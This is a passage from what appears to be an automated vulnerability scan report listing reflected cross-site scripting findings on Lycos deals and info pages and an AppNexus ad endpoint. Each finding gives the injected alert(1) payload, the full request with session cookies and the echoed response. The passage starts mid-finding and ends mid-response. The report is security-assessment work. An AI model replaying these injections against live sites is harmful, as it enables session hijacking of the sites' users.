This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/sports-and-fitness-211?b1636"style%3d"x%3aexpression(alert(1))"804d8716915=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b1636"style="x:expression(alert(1))"804d8716915=1">
...[SNIP]...

1.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25137"style%3d"x%3aexpression(alert(1))"bca27b4183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25137"style="x:expression(alert(1))"bca27b4183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/televisions-159?25137"style%3d"x%3aexpression(alert(1))"bca27b4183=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;25137"style="x:expression(alert(1))"bca27b4183=1">
...[SNIP]...

1.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23e36"style="x:expression(alert(1))"b5dbc63acb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/travel-and-entertainment-206?23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;23e36"style="x:expression(alert(1))"b5dbc63acb4=1">
...[SNIP]...

1.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9585"style="x:expression(alert(1))"08d8944c63d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/best-buy-560?d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;d9585"style="x:expression(alert(1))"08d8944c63d=1">
...[SNIP]...

1.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e75fd"style="x:expression(alert(1))"3e066d15b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/buy-com-233?e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e75fd"style="x:expression(alert(1))"3e066d15b13=1">
...[SNIP]...

1.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61e95"style="x:expression(alert(1))"a787e8b7cfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/dell-home-638?61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;61e95"style="x:expression(alert(1))"a787e8b7cfe=1">
...[SNIP]...

1.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf14a"style="x:expression(alert(1))"366512bb10b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/ebay-50?bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;bf14a"style="x:expression(alert(1))"366512bb10b=1">
...[SNIP]...

1.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c84"style%3d"x%3aexpression(alert(1))"9dccb822702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13c84"style="x:expression(alert(1))"9dccb822702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/itunes-music-store-1414?13c84"style%3d"x%3aexpression(alert(1))"9dccb822702=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;13c84"style="x:expression(alert(1))"9dccb822702=1">
...[SNIP]...

1.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0561"style="x:expression(alert(1))"97f7932e4ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/walmart-321?a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;a0561"style="x:expression(alert(1))"97f7932e4ff=1">
...[SNIP]...

1.51. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a5a5'%3balert(1)//7777e16fd16 was submitted in the redir parameter. This input was echoed as 4a5a5';alert(1)//7777e16fd16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.idg_b2c&size=728x90&referrer=http%3A%2F%2Fshopping.lycos.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-6268295_1292163909%2C%2Cshop%2C%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D980870%3Bcontx%3Dshop%3Ban%3D{PRICEBUCKET}%3Bdc%3Dd%3Bbtg%3D%3Bord%3D5266572%3F4a5a5'%3balert(1)//7777e16fd16 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://shopping.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=1253520181866309356; icu=EAAYAA..; acb244106=5_[r^kI/7ZI!97E0nf8MG#ngg?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgP4AtEUe-YV1k7KbsxvZlZREt2wRNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADrHzp9&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292163885%29%3Buf%28%27r%27%2C+114384%2C+1292163885%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2811%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2887%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28619%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28620%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28621%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; sess=1; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTSHJTy]F]k($WNwJP'.<5sLEKRldcpNp)Ec(kJ6st'z3Uv2?!F?0<:.kuRsX$mCQui>4M`J`y*aOn9LJHv?jDa''Df?dw]@K3NPeORWrK5v*s0045+'v.Jg1BCTjbtb.(7Yo>`<xZkofNI5StD5bqM=kN.BbMwKNO7wJ?G+_W?^@>wr?4/0viQZwz3N4Erbd<u$`O`Fg>TW*rP!?5iWVO-@k

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb244106=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Sat, 12-Mar-2011 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb7262=5_[r^kI/7ZI!97E0nf8M>yz4N?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgPwols7zZIRBB7KbsxvZlZREU3ARNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADXH3V5&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292164116%29%3Buf%28%27r%27%2C+114384%2C+1292164116%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2811%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2887%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28619%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28620%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28621%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 12 Dec 2010 14:28:36 GMT
Content-Length: 365

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.idg_b2c/;net=cm;u=,cm-6268295_1292163909,,shop,;;cmw=owl;sz=728x90;net=cm;ord1=980870;contx=shop;an=40;dc=d;btg=;ord=5266572?4a5a5';alert(1)//7777e16fd16">
...[SNIP]...

1.52. http://info.lycos.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c59d"><script>alert(1)</script>b1e138b458a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images9c59d"><script>alert(1)</script>b1e138b458a HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:05 GMT; path=/
